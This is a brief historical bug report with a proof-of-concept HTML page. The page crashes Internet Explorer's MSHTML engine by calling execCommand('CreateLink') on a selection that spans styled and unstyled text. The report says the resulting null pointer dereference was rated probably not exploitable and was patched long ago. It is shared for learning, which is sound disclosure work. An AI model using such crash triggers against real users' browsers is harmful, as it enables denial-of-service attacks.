A brief crash report. Calling execCommand("CreateLink") on a text range that spanned both styled and unstyled text triggered a null pointer dereference in MSHTML!CBaseCharCommand::IsSimpleStyleContributor.

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>DoS_execCommand_CreateLink</title>
</head>
<body>
<span style="color:blue">TEXT WITH STYLE</span> TEXT WITHOUT STLYE
<script language="JavaScript">
function main()
{
	var bodyRange = document.body.createTextRange();
	bodyRange.findText("STYLE TEXT");
	bodyRange.select();
	setTimeout('document.execCommand("CreateLink", false, "http://www.bing.com");', 100);
}
</script>
</body>
</html>

The crash was classified as PROBABLY_NOT_EXPLOITABLE. The selection had to include text with an inline style immediately adjacent to unstyled text; the CreateLink command then attempted to analyze style contributors across that boundary and dereferenced a null pointer.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.